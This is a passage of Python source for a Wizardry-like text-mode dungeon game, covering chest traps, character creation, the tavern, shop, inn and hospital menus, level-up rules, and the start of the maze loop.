game.party.move(random.randrange(game.party.floor.x_size),\n random.randrange(game.party.floor.y_size))\n elif self.trap == Trap.ALARM:\n party.alarm = True\n elif self.trap == Trap.MAGE_BLASTER:\n for m in game.party.members:\n if m.job == Job.MAGE:\n if random.randrange(20) >= m.stat[5]:\n if m.state in [State.OK]:\n m.state = State.PARALYZED\n mw.print(f\"{m.name} is paralyzed.\", start=' ')\n else:\n if m.state in [State.OK, State.PARALYZED]:\n m.state = State.STONED\n mw.print(f\"{m.name} is petrified.\", start=' ')\n elif m.job == Job.SAMURAI:\n if random.randrange(20) >= m.stat[5]:\n if m.state in [State.OK]:\n m.state = State.PARALYZED\n mw.print(f\"{m.name} is paralyzed.\", start=' ')\n v.disp_scrwin()\n elif self.trap == Trap.PRIEST_BLASTER:\n for m in game.party.members:\n if m.job == Job.PRIEST:\n if random.randrange(20) >= m.stat[5]:\n if m.state in [State.OK]:\n m.state = State.PARALYZED\n mw.print(f\"{m.name} is paralyzed.\", start=' ')\n else:\n if m.state in [State.OK, State.PARALYZED]:\n m.state = State.STONED\n mw.print(f\"{m.name} is petrified.\", start=' ')\n elif m.job == Job.LORD:\n if random.randrange(20) >= m.stat[5]:\n if m.state in [State.OK]:\n m.state = State.PARALYZED\n mw.print(f\"{m.name} is paralyzed.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n\n def choose_trap(self):\n \"\"\"\n Decide which trap the chest has.\n \"\"\"\n game = self.game\n if game.party.floor <= 2:\n trap = random.choice([Trap.TRAPLESS_CHEST, Trap.POISON_NEEDLE,\n Trap.CROSSBOW_BOLT])\n elif game.party.floor <= 5:\n trap = random.choice(\n [Trap.TRAPLESS_CHEST, Trap.POISON_NEEDLE, Trap.CROSSBOW_BOLT,\n Trap.GAS_BOMB, Trap.EXPLODING_BOX, Trap.STUNNER])\n elif game.party.floor <= 8:\n trap = random.choice(\n [Trap.TRAPLESS_CHEST, Trap.GAS_BOMB, Trap.EXPLODING_BOX,\n Trap.STUNNER, Trap.MAGE_BLASTER, Trap.PRIEST_BLASTER])\n else:\n trap = random.choice(\n [Trap.TRAPLESS_CHEST, Trap.GAS_BOMB, Trap.EXPLODING_BOX,\n Trap.STUNNER, Trap.MAGE_BLASTER, Trap.PRIEST_BLASTER,\n Trap.TELEPORTER, Trap.ALARM])\n return trap\n\n\ndef terminal_size():\n \"\"\"\n Get terminal size\n Will return width and height\n \"\"\"\n h, w, hp, wp = struct.unpack('HHHH',\n fcntl.ioctl(0, termios.TIOCGWINSZ,\n struct.pack('HHHH', 0, 0, 0, 0)))\n return w, h\n\n\ndef getch(wait=False):\n \"\"\"\n realtime key scan\n wait - if it waits (blocks) for user input\n \"\"\"\n if os_windows:\n while True:\n if msvcrt.kbhit() or wait: # msvcrt.kbhit() is non-blocking\n c = msvcrt.getch() # msvcrt.getch() is blocking\n if c == 'Q':\n sys.exit()\n return c\n\n fd = sys.stdin.fileno()\n oattr = termios.tcgetattr(fd)\n ch = ''\n try:\n while ch == '':\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n if not wait:\n break\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, oattr)\n if ch == 'Q':\n sys.exit()\n return ch\n\n\ndef dice(valstr):\n \"\"\"\n valstr as \"2D+4\", \"10D+300\", etc.\n \"\"\"\n pattern = r\"(\\d+)[dD](\\d+)(\\+(\\d+))?\"\n m = re.search(pattern, valstr)\n total = 0\n if m[4] is None:\n plus = 0\n else:\n plus = int(m[4])\n for _ in range(int(m[1])):\n total += random.randint(1, int(m[2]))\n return total + plus\n\n\ndef create_character(game):\n \"\"\"\n Create a character (a training grounds menu item)\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n while True:\n if (name := mw.input(\"Enter new name\")):\n if name in [char.name for char in game.characters]:\n mw.print(\"The name is already used\", start=' ')\n vscr.disp_scrwin()\n else:\n break\n vscr.disp_scrwin()\n\n mw.print(\"Choose race -\")\n c = mw.input_char(\" h)uman e)lf d)warf g)nome o)hobbit\",\n values=['h', 'e', 'd', 'g', 'o'])\n if c == 'h':\n race = Race.HUMAN\n elif c == 'e':\n race = Race.ELF\n elif c == 'd':\n race = Race.DWARF\n elif c == 'g':\n race = Race.GNOME\n else:\n race = Race.HOBBIT\n mw.print(f\"{race.name.lower()}\")\n vscr.disp_scrwin()\n\n c = mw.input_char(\n \"Choose alignment - g)ood n)eutral e)vil\", values=['g', 'n', 'e'])\n if c == 'g':\n align = Align.GOOD\n elif c == 'n':\n align = Align.NEUTRAL\n else:\n align = Align.EVIL\n mw.print(f\"Alignment: {align.name.lower()}\")\n vscr.disp_scrwin()\n\n ch = Member(name, align, race)\n ch.distribute_bonus(game)\n\n\ndef inspect_characters(game):\n \"\"\"\n Inspect characters (a training grounds menu item)\n Can delete a character from here, too.\n \"\"\"\n vscr = game.vscr\n newwin = False\n mw = vscr.meswins[-1]\n if mw.height < 16:\n mw = Meswin(vscr, 10, 2, 60, 16, frame=True)\n vscr.meswins.append(mw)\n newwin = True\n mw.mes_lines = []\n vscr.disp_scrwin()\n cnum = 0\n while True:\n chlist = game.party.members\n if game.party.place == Place.TRAINING_GROUNDS:\n chlist = game.characters\n mw.mes_lines = []\n mw.print(\"Inspect characters\")\n mw.print(\" - j)down k)up i)nspect d)elete l)eave\")\n for i, mem in enumerate(chlist):\n if i == cnum:\n cur = ' >'\n else:\n cur = ' '\n mw.print(''.join([cur, str(i+1), ' ', str(mem)]), start=' ')\n vscr.disp_scrwin()\n c = getch()\n if c == 'l':\n break\n elif c == 'j' and cnum < len(chlist)-1:\n cnum += 1\n elif c == 'k' and cnum > 0:\n cnum -= 1\n elif c == 'i' and len(chlist) > 0:\n while True:\n rtn = chlist[cnum].inspect_character(game)\n if rtn == 0:\n break\n cnum += rtn\n if cnum < 0:\n cnum = len(chlist)-1\n elif cnum >= len(chlist):\n cnum = 0\n elif c == 'd' and len(chlist) > 0 and \\\n mem not in game.party.members:\n mem = chlist[cnum]\n nw = Meswin(vscr, 16, 8, 54, 3, frame=True)\n vscr.meswins.append(nw)\n c = nw.input_char(f\"Delete {mem.name} permanently? (y/n)\",\n values=['y', 'n'])\n if c == 'y':\n chlist.remove(mem)\n nw.print(f\"{mem.name} is deleted.\")\n if cnum >= len(chlist):\n cnum -= 1\n vscr.disp_scrwin()\n getch(wait=True)\n vscr.meswins.pop()\n if newwin:\n vscr.meswins.pop()\n vscr.cls()\n\n\ndef training(game):\n \"\"\"\n Training grounds main (an edge of town menu item)\n \"\"\"\n vscr = game.vscr\n game.party.place = Place.TRAINING_GROUNDS\n mw = vscr.meswins[-1]\n vscr.cls()\n vscr.disp_scrwin()\n while True:\n mw.print(\n \"\\n*** training grounds ***\\nc)reate a character\\ni)nspect a character\\nl)eave\", start=' ')\n vscr.disp_scrwin()\n c = mw.input_char(\"Command?\", values=['c', 'i', 'l'])\n if c == 'l':\n break\n elif c == 'c':\n create_character(game)\n elif c == 'i':\n inspect_characters(game)\n\n\ndef tavern_add(game):\n \"\"\"\n Add members to the party (a tavern item)\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n if len(game.party.members) >= 6:\n mw.print(\"Party full.\")\n vscr.disp_scrwin()\n return\n\n vscr.disp_scrwin()\n chwin = Meswin(vscr, 12, 2, 40, 16)\n vscr.meswins.append(chwin)\n top = idx = 0\n while True:\n chlines = []\n i = 0\n charlist = [\n ch for ch in game.characters\n if (ch not in game.party.members and not ch.in_maze)]\n for i, ch in enumerate(charlist):\n cur = ' '\n if i == idx:\n cur = '>'\n cur_ch = ch\n chline = f\"| {cur}{i+1:2} {ch.name.ljust(16)} Lv{ch.level:3d} {ch.race.name[:3]}-{ch.align.name[:1]}-{ch.job.name[:3]}\"\n chlines.append(chline)\n chwin.mes_lines = []\n chwin.mes_lines.append(\n \"| Add who to the party?\".ljust(chwin.width-1)+'|')\n chwin.mes_lines.append(\n \"| - j)down k)up x)choose l)eave\".ljust(chwin.width-1)+'|')\n for chl in chlines[top:top+chwin.height-2]:\n chwin.mes_lines.append(chl.ljust(chwin.width-1)+'|')\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 'l':\n break\n elif c == 'j' and idx < len(charlist)-1:\n idx += 1\n top = max(0, idx-chwin.height+3)\n elif c == 'k' and idx > 0:\n idx -= 1\n top = min(top, idx)\n elif c == 'x':\n game.party.members.append(cur_ch)\n if idx >= len(charlist)-1:\n idx -= 1\n if len(game.party.members) >= 6 or len(charlist) <= 1:\n break\n vscr.meswins.pop()\n vscr.cls()\n vscr.disp_scrwin()\n\n\ndef tavern(game):\n \"\"\"\n tavern (a castle item)\n add/remove members to the party, inspect, divide golds, etc.\n \"\"\"\n game.party.place = Place.HAWTHORNE_TAVERN\n vscr = game.vscr\n mw = vscr.meswins[-1]\n newwin = False\n if mw.height < 16:\n mw = Meswin(vscr, 8, 2, 64, 16, frame=True)\n vscr.meswins.append(mw)\n newwin = True\n ch = ''\n while True:\n mw.print(\"\\n*** The Hawthorne Tavern ***\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command? - a)dd r)emove i)nspect d)ivvy gold l)eave\",\n values=['a', 'r', 'i', 'd', 'l', '^'])\n if ch == 'l':\n game.party.place = Place.CASTLE\n break\n elif ch == '^' and config['debug']:\n mw.print(\"debug twice!\")\n for mem in game.party.members:\n mem.exp *= 2\n mem.gold *= 2\n elif ch == 'd':\n if not game.party.members:\n continue\n total = sum(mem.gold for mem in game.party.members)\n each = total // len(game.party.members)\n for mem in game.party.members:\n total -= each\n mem.gold = each\n mem.gold += total # remaining\n elif ch == 'a':\n if len(game.party.members) < len(game.characters):\n tavern_add(game)\n else:\n mw.print(\"No characters to add\")\n elif ch == 'i':\n if not game.party.members:\n continue\n idx = 0\n while True:\n mem = game.party.members[idx]\n rtn = mem.inspect_character(game)\n if rtn == 0:\n break\n idx += rtn\n if idx < 0:\n idx = len(game.party.members) - 1\n elif idx >= len(game.party.members):\n idx = 0\n elif ch == 'r':\n game.party.remove_character(game)\n if newwin:\n vscr.meswins.pop()\n vscr.cls()\n\n\ndef trader_buy(game, mem):\n \"\"\"\n a member chooses and buys items from shop inventory\n \"\"\"\n vscr = game.vscr\n iw = Meswin(vscr, 12, 1, 48, 12, frame=True)\n vscr.meswins.append(iw)\n top = idx = page = 0\n pages = (('weapon'), ('armor'), ('shield', 'helm', 'gloves'),\n ('ring', 'item'))\n while True:\n items = [item for item in game.shopitems if game.shopitems[item] > 0\n and game.itemdef[item].type in pages[page]]\n ilines = []\n for i, item in enumerate(items):\n cur = ' '\n if i == idx:\n cur = '>'\n cur_item = i\n afford = canequip = ' '\n if mem.job.name[:1].lower() not in game.itemdef[item].jobs.lower():\n canequip = '#'\n if mem.gold >= game.itemdef[item].price:\n afford = '$'\n iline = f\"{cur}{i+1:2} {item.ljust(iw.width-24)[:iw.width-24]} {game.itemdef[item].price:10d}{canequip}{afford}\"\n ilines.append(iline)\n iw.mes_lines = []\n iw.mes_lines.append(\n f\"{mem.name} has {mem.gold} gold\")\n iw.mes_lines.append(\" jk)cursor x)choose hl)page ;)leave\")\n for il in ilines[top:top+iw.height-2]:\n iw.mes_lines.append(il.ljust(iw.width-6))\n for _ in range(iw.width - len(iw.mes_lines)):\n iw.mes_lines.append(' '*(iw.width-6))\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == ';':\n break\n elif c == 'j' and idx < len(items)-1:\n idx += 1\n top = max(0, idx-iw.height+3)\n elif c == 'k' and idx > 0:\n idx -= 1\n top = min(top, idx)\n elif c == 'h':\n idx = top = 0\n page -= 1\n if page < 0:\n page = len(pages)-1\n elif c == 'l':\n idx = top = 0\n page += 1\n if page >= len(pages):\n page = 0\n elif c == 'x':\n if len(mem.items) >= 8:\n iw.mes_lines[0] = \"Looks like, your bag is full.\"\n vscr.disp_scrwin()\n getch()\n elif mem.gold < game.itemdef[items[idx]].price:\n iw.mes_lines[0] = \"Sorry, you can't afford it.\"\n iw.mes_lines[1] = f\"Will someone else pay? (y/n)>\"\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 'y':\n if game.party.pay(game.itemdef[items[idx]].price):\n bought = [items[idx], False, False, False]\n mem.items.append(bought)\n game.shopitems[items[idx]] -= 1\n iw.mes_lines[0] = \"Anything else, noble sir?\"\n else:\n iw.mes_lines[0] = \"Oh, I'm sorry.\"\n iw.mes_lines[1] = \"\"\n vscr.disp_scrwin()\n getch(wait=True)\n\n else:\n iw.mes_lines[0] = \"Anything else, noble sir?\"\n mem.gold -= game.itemdef[items[idx]].price\n bought = [items[idx], False, False, False]\n mem.items.append(bought)\n game.shopitems[items[idx]] -= 1\n vscr.disp_scrwin()\n getch()\n vscr.cls()\n vscr.meswins.pop()\n\n\ndef trader_sell(game, mem, op):\n \"\"\"\n sell, uncurse or identify items\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n if op == 's':\n opword = 'sell'\n div = 2\n elif op == 'u':\n opword = 'uncurse'\n div = 2\n else:\n opword = 'identify'\n div = 4\n\n mw.print(f\"Which item to {opword}? - # or leave\")\n idic = {}\n for i, item in enumerate(mem.items, 1):\n dispname = item[0]\n mark = ' '\n if op == 'u': # uncurse\n if not item[2]:\n continue\n mark = '&'\n if item[3]:\n dispname = ''.join(['?', game.itemdef[item[0]].unident])\n elif op == 'i': # identify\n if (not item[3]) or item[2]:\n continue\n dispname = ''.join(['?', game.itemdef[item[0]].unident])\n else: # sell\n if item[1] or item[2] or item[3]:\n continue\n price = game.itemdef[item[0]].price//div\n if op == 'i':\n price = min(1000, max(price, 20))\n mw.print(\n f\"{i}){mark}{dispname.ljust(24)} {price}\",\n start=' ')\n idic[i] = (item[0], dispname, price)\n\n while True:\n c = mw.input_char(\"# or l)eave\")\n if c == 'l':\n return\n try:\n if int(c) in idic:\n break\n except:\n continue\n game.shopitems[idic[int(c)][0]] += 1\n price = idic[int(c)][2]\n if op == 's':\n if price == 0:\n mw.print(\"Sorry, but not interested.\")\n else:\n mem.gold += price\n del mem.items[int(c)-1]\n mw.print(\"I'm sure fellows'll want it.\")\n elif op == 'i':\n if mem.gold < price:\n mw.print(\"Oh, you can't afford it.\")\n yn = mw.input_char(\"Someone else will pay? (y/n)\",\n values=['y', 'n'])\n if yn == 'y':\n game.party.pay(price)\n else:\n mw.print(\"Ok, fine.\")\n return\n else:\n mem.gold -= price\n mem.items[int(c)-1][3] = False # identified\n mw.print(f\"Identified as {mem.items[int(c)-1][0]}.\")\n else:\n if mem.gold < price:\n mw.print(\"Um, you can't afford it.\")\n yn = mw.input_char(\"Someone else will pay? (y/n)\",\n values=['y', 'n'])\n if yn == 'y':\n game.party.pay(price)\n else:\n mw.print(\"Ok, fine.\")\n return\n else:\n mem.gold -= price\n mw.print(f\"Uncursed {mem.items[int(c)-1][0]}.\")\n del mem.items[int(c)-1]\n\n game.vscr.disp_scrwin()\n getch()\n\n\ndef trader(game):\n \"\"\"\n shop (a castle item)\n choose a member and he/she buys, sells items, etc.\n \"\"\"\n if not game.party.members:\n return\n game.party.place = Place.TRADER_JAYS\n vscr = game.vscr\n mw = vscr.meswins[-1]\n while True:\n mw.print(\"\\n*** Trader Jay's ***\", start=' ')\n vscr.disp_scrwin()\n mem = game.party.choose_character(game)\n if not mem:\n break\n while True:\n mw.print(f\"Welcome, {mem.name}.\")\n mw.print(f\" You have {mem.gold} gold.\")\n ch = mw.input_char(f\"b)uy s)ell u)ncurse i)dentify p)ool gold l)eave\",\n values=['b', 's', 'u', 'i', 'p', 'l'])\n if ch == 'l':\n break\n elif ch == 'b':\n trader_buy(game, mem)\n elif ch in 'sui':\n trader_sell(game, mem, ch)\n elif ch == 'p':\n gold = 0\n for c in game.party.members:\n gold += c.gold\n c.gold = 0\n mem.gold = gold\n\n\ndef levelup(game, m):\n \"\"\"\n Check and levelup the member.\n Returns the number of level-ups and if learned spell(s).\n \"\"\"\n levelup = 0\n learned = False\n while True:\n if m.level < 13:\n next = level_table[m.job][m.level-1]\n else:\n next = level_table[m.job][11] + \\\n level_table[m.job][12]*(m.level-12)\n m.nextexp = next\n if next > m.exp:\n return levelup, learned\n\n levelup += 1\n\n for i in range(6):\n r = random.randrange(100)\n if r < 15: # 15%\n m.stat[i] -= 1\n elif r >= 55: # 55%\n m.stat[i] += 1\n m.stat[i] = min(m.stat[i], race_status[m.race][i]+10)\n\n m.level += 1\n newhp = 0\n if m.stat[3] <= 3:\n plus = -2\n elif m.stat[3] <= 5:\n plus = -1\n elif m.stat[3] >= 20:\n plus = 4\n elif m.stat[3] >= 18:\n plus = 3\n elif m.stat[3] >= 16:\n plus = 2\n elif m.stat[3] >= 15:\n plus = 1\n else:\n plus = 0\n\n jobdice = {\n Job.FIGHTER: '1D10',\n Job.LORD: '1D10',\n Job.PRIEST: '1D8',\n Job.SAMURAI: '1D8',\n Job.THIEF: '1D6',\n Job.BISHOP: '1D6',\n Job.NINJA: '1D6',\n Job.MAGE: '1D4',\n }\n d = jobdice[m.job]\n times = m.level\n if m.job == Job.SAMURAI:\n times += 1\n for _ in range(times):\n p = dice(d) + plus\n if p < 1:\n p = 1\n newhp += p\n\n if newhp > m.maxhp:\n m.maxhp = newhp\n else:\n m.maxhp += 1\n\n m.hp = m.maxhp\n\n if m.job == Job.MAGE:\n sc = game.spell.spell_counts(0, 2, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n elif m.job == Job.PRIEST:\n sc = game.spell.spell_counts(0, 2, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n elif m.job == Job.BISHOP:\n sc = game.spell.spell_counts(0, 4, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n sc = game.spell.spell_counts(3, 4, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n elif m.job == Job.SAMURAI:\n sc = game.spell.spell_counts(3, 3, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n elif m.job == Job.LORD:\n sc = game.spell.spell_counts(3, 2, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n\n for sname in game.spelldef:\n if game.spelldef[sname].categ == 'mage':\n # memorize the spell if iq > randrange(30), he/she\n # has not learned it yet and the spell count of the level > 0\n if m.stat[1] > random.randrange(30): # iq\n if sname not in m.mspells and \\\n m.mspell_max[game.spelldef[sname].level-1] > 0:\n m.mspells.append(sname)\n learned = True\n # memorize the 1st spell of the level if he/she\n # has not memorized any spell of the level but\n # his/her spell count of the level > 0\n if m.mspell_max[game.spelldef[sname].level-1] > 0 and \\\n sum(1 for spl in m.mspells if\n game.spelldef[spl].level == game.spelldef[sname].level) == 0:\n m.mspells.append(sname)\n learned = True\n else:\n if m.stat[2] > random.randrange(30): # piety\n if sname not in m.pspells and \\\n m.pspell_max[game.spelldef[sname].level-1] > 0:\n m.pspells.append(sname)\n learned = True\n if m.pspell_max[game.spelldef[sname].level-1] > 0 and \\\n sum(1 for spl in m.pspells if\n game.spelldef[spl].level == game.spelldef[sname].level) == 0:\n m.pspells.append(sname)\n learned = True\n mspells = []\n pspells = []\n for sname in game.spelldef: # reorder\n if sname in m.mspells:\n mspells.append(sname)\n elif sname in m.pspells:\n pspells.append(sname)\n m.mspells = mspells\n m.pspells = pspells\n\n for idx in range(7):\n know = sum(1 for s in m.mspells if\n game.spelldef[s].level == idx+1 and\n game.spelldef[s].categ == 'mage')\n m.mspell_max[idx] = max(m.mspell_max[idx], know)\n know = sum(1 for s in m.pspells if\n game.spelldef[s].level == idx+1 and\n game.spelldef[s].categ == 'priest')\n m.pspell_max[idx] = max(m.pspell_max[idx], know)\n\n\ndef sleep(game, m, healhp):\n \"\"\"\n Sleep a night. Heal hp, restore MPs and check for level-ups.\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n mw.print(f\"{m.name} went to bed...\")\n v.disp_scrwin()\n getch(wait=True)\n\n oldstate = m.stat[:]\n oldhp = m.maxhp\n levels, learned = levelup(game, m)\n\n m.hp += healhp\n if m.hp > m.maxhp:\n m.hp = m.maxhp\n\n m.mspell_cnt = m.mspell_max[:]\n m.pspell_cnt = m.pspell_max[:]\n\n if levels > 0:\n mw.print(f\"Level up!\")\n if m.stat[0] > oldstate[0]:\n mw.print(f\"Gained strength by {m.stat[0]-oldstate[0]} points.\")\n elif m.stat[0] < oldstate[0]:\n mw.print(f\"Lost strength by {oldstate[0]-m.stat[0]} points.\")\n if m.stat[1] > oldstate[1]:\n mw.print(\n f\"Gained i.q. by {m.stat[1]-oldstate[1]} points.\", start=' ')\n elif m.stat[1] < oldstate[1]:\n mw.print(\n f\"Lost i.q. by {oldstate[1]-m.stat[1]} points.\", start=' ')\n if m.stat[2] > oldstate[2]:\n mw.print(\n f\"Gained piety by {m.stat[2]-oldstate[2]} points.\", start=' ')\n elif m.stat[2] < oldstate[2]:\n mw.print(\n f\"Lost piety by {oldstate[2]-m.stat[2]} points.\", start=' ')\n if m.stat[3] > oldstate[3]:\n mw.print(\n f\"Gained vitality by {m.stat[3]-oldstate[3]} points.\", start=' ')\n elif m.stat[3] < oldstate[3]:\n mw.print(\n f\"Lost vitality by {oldstate[3]-m.stat[3]} points.\", start=' ')\n if m.stat[4] > oldstate[4]:\n mw.print(\n f\"Gained agility by {m.stat[4]-oldstate[4]} points.\", start=' ')\n elif m.stat[4] < oldstate[4]:\n mw.print(\n f\"Lost agility by {oldstate[4]-m.stat[4]} points.\", start=' ')\n if m.stat[5] > oldstate[5]:\n mw.print(\n f\"Gained luck by {m.stat[5]-oldstate[5]} points.\", start=' ')\n elif m.stat[5] < oldstate[5]:\n mw.print(\n f\"Lost luck by {oldstate[5]-m.stat[5]} points.\", start=' ')\n if m.maxhp > oldhp:\n mw.print(\n f\"Your hp increased by {m.maxhp-oldhp} points.\", start=' ')\n elif m.maxhp < oldhp:\n mw.print(\n f\"Your hp decreased by {oldhp-m.maxhp} points.\", start=' ')\n if learned:\n mw.print(f\"Leaned new spells.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n\n\ndef inn(game):\n if not game.party.members:\n return\n v = game.vscr\n game.party.place = Place.LAKEHOUSE_INN\n mw = v.meswins[-1]\n num = len(game.party.members)\n gold = sum(m.gold for m in game.party.members)\n mw.print(\"\\n*** The Lakehouse Inn ***\", start=' ')\n mw.print(f\"Welcome. You must be very tired.\", start=' ')\n mw.print(f\"You have {gold} gold in total.\", start=' ')\n mw.print(f\"c)ots {2*num:4d} gold\", start=' ')\n mw.print(f\"s)tandard rooms {20*num:4d} gold\", start=' ')\n mw.print(f\"d)elux rooms {100*num:4d} gold\", start=' ')\n mw.print(f\"v)lake view suites {500*num:4d} gold\", start=' ')\n mw.print(f\"p)residential suites {2000*num:4d} gold\", start=' ')\n mw.print(f\"or l)eave\", start=' ')\n c = mw.input_char(\"Which rooms to stay today?\",\n values=['c', 's', 'd', 'v', 'p', 'l'])\n if c == 'l':\n return\n elif c == 'c':\n uprice = 2\n dinner = 'cabbage soup'\n elif c == 's':\n uprice = 20\n dinner = random.choice(['juicy hamburgers', 'pork and scallion',\n 'chiken pho', 'dana masala',\n 'beef and broccoli', 'pizza slices'])\n elif c == 'd':\n uprice = 100\n dinner = random.choice(['grilled sword fish', 'ribeye steak',\n 'temaki sushi', 'lamb chops', 'fillet mignon',\n 'maine lobster roll', 'juicy white asparagus'])\n elif c == 'v':\n uprice = 500\n dinner = random.choice([\"wine and dry-aged beef fillet mignon\",\n \"california wine and kobe beef NY strip steak\",\n \"ooma kuromaguro toro tuna sushi\"])\n else: # presidential suites\n uprice = 2000\n dinner = random.choice(['supreme course w/ champagne',\n \"chef's special w/ vintage wine\",\n \"jiro sushi w/ daiginjyo sake\",\n \"manchu-han imperial feast course\"])\n if not game.party.pay(uprice*num):\n mw.print(\"You can't afford the room.\")\n v.disp_scrwin()\n return\n mw.print(f\"Today's dinner is {dinner}.\")\n for mem in game.party.members:\n sleep(game, mem, uprice*2)\n\n\ndef hospital(game):\n if not game.party.members:\n return\n v = game.vscr\n game.party.place = Place.MGH\n mw = v.meswins[-1]\n num = len(game.party.members)\n gold = sum(m.gold for m in game.party.members)\n pricing = {\n State.PARALYZED: 50,\n State.STONED: 100,\n State.DEAD: 200,\n State.ASHED: 500,\n }\n mw.print(\"\\n *** Moss General Hospital ***\", start=' ')\n v.disp_scrwin()\n hlist = game.hospitalized[:]\n for p in hlist:\n price = pricing[p.state] * p.level\n mw.print(\n f\"{p.name} is in ER and in a dangerous condition.\")\n mw.print(\n f\"Would someone pay for {p.name}? It would be {price} gold.\")\n c = mw.input_char(\"Pay? (y/n)\", values=['y', 'n'])\n if c == 'y':\n if not game.party.pay(price):\n mw.print(\"You can't afford it.\")\n v.disp_scrwin()\n continue\n if p.state == State.DEAD and \\\n random.randrange(100) > 50 + (3*p.stat[3]):\n mw.print(\"Oops..\")\n v.disp_scrwin()\n p.state = State.ASHED\n elif p.state == State.ASHED and \\\n random.randrange(100) > 40 + (3*p.stat[3]):\n mw.print(\"...(oh my god)...\")\n v.disp_scrwin()\n p.state = State.LOST\n else:\n mw.print(f\"{p.name} was cured.\")\n v.disp_scrwin()\n game.hospitalized.remove(p)\n p.state = State.OK\n p.hp = p.maxhp\n getch(wait=True)\n mw.print(\"They left MGH.\")\n v.disp_scrwin()\n getch(wait=True)\n\n\ndef castle(game):\n \"\"\"\n castle main\n dispatch to tavern, shop, inn or temple\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n vscr.cls()\n vscr.disp_scrwin()\n ch = ''\n while True:\n mw.cls()\n game.party.place = Place.CASTLE\n mw.print(\"*** Castle ***\", start=' ')\n mw.print(\"h)awthorne tavern\\nt)rader jay's\\ni)lakehouse inn\", start=' ')\n mw.print(\"m)oss general hospital\\ne)dge of town\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command?\", values=['h', 'e', 't', 'i', 'm'])\n if ch == 'h':\n tavern(game)\n elif ch == 'e':\n game.party.place = Place.EDGE_OF_TOWN\n break\n elif ch == 't':\n trader(game)\n elif ch == 'i':\n inn(game)\n elif ch == 'm':\n hospital(game)\n\n\ndef edge_town(game):\n \"\"\"\n edge of town main\n dispatch to training grounds\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n ch = ''\n while ch != 'c':\n mw.cls()\n game.party.place = Place.EDGE_OF_TOWN\n mw.print(\"*** Edge of Town ***\", start=' ')\n mw.print(\n \"m)aze\\nt)raining grounds\\nc)astle\\nS)ave and quit game\\nR)esume from saved data\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command? \", values=['t', 'S', 'm', 'c', 'R'])\n if ch == 't':\n training(game)\n elif ch == 'c':\n game.party.place = Place.CASTLE\n break\n elif ch == 'm':\n if game.party.members:\n game.party.place = Place.MAZE\n else:\n mw.print(\"No party members.\")\n break\n elif ch == 'S':\n game.save()\n mw.print(\"Thank you for playing.\")\n mw.print(\"See you soon.\")\n vscr.disp_scrwin()\n sys.exit()\n elif ch == 'R':\n if game.load():\n mw.print(\"loaded.\")\n vscr.disp_scrwin()\n break\n\n\ndef camp(game, floor_obj):\n \"\"\"\n Camp main\n \"\"\"\n game.party.place = Place.CAMP\n v = game.vscr\n mw = Meswin(v, 10, 1, 64, 17, frame=True)\n v.meswins.append(mw)\n\n while not game.party.floor_move: # tsubasa?\n mw.print(\n \"*** Camp ***\\ni)nspect\\nr)eorder party\\nh)eal all members\\np)rep for adventure\\nS)ave and quit game\\nl)eave\")\n c = mw.input_char(\"Command?\", values=['i', 'r', 'S', 'l', 'h', 'p'])\n if c == 'l':\n break\n elif c == 'r':\n game.party.reorder(game)\n elif c == 'h':\n game.party.heal(game)\n elif c == 'p':\n game.party.prep(game)\n elif c == 'S':\n game.party.place = Place.MAZE\n game.save()\n mw.print(\"Thank you for playing.\")\n mw.print(\"See you again soon.\")\n v.disp_scrwin()\n sys.exit()\n elif c == 'i':\n idx = 1\n while not game.party.floor_move: # tsubasa?\n mem = game.party.members[idx-1]\n rtn = mem.inspect_character(game)\n if rtn == 0:\n break\n idx += rtn\n if idx < 0:\n idx = len(game.party.members) - 1\n elif idx >= len(game.party.members):\n idx = 0\n\n v.disp_scrwin(floor_obj)\n v.meswins.pop()\n game.party.place = Place.MAZE\n\n\ndef maze(game):\n \"\"\"\n Maze (dungeon) main\n \"\"\"\n\n vscr = game.vscr\n meswins_save = vscr.meswins\n meswin = vscr.meswins[0]\n vscr.meswins = [meswin]\n\n dungeon = game.dungeon\n party = game.party\n\n if not party.resumed and\\\n party.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n party.place = Place.MAZE\n party.floor = 0\n party.floor_move = 1 # 0: no, 1: down, 2: up\n\n dungeon.floors = [] # initialize every time\n party.floor_obj = floor_obj = None\n party.resumed = False\n\n while True:\n dungeon.generate_move_floors()\n floor_obj = party.floor_obj\n\n if party.light_cnt > 0: # milwa/lomilwa counter\n party.light_cnt -= 1\n\n party.calc_hpplus(game)\n for mem in party.members:\n if mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.hp = max(1, mem.hp+mem.hpplus)\n\n vscr.disp_scrwin()\n\n rt = floor_obj.check_event(game)\n if party.defeated(): # Defeated by boss monster?\n break\n if not rt: # event processed\n rtn = game.battle.check_battle()\n if rtn: # 1: random or 2: room (or 3?) if battle\n meswin.print(\"*** encounter ***\")\n vscr.disp_scrwin(floor_obj)\n getch()\n game.battle.battle()\n if party.defeated(): # party defeated\n break\n if rtn == 2 and game.battle.treasure: # room 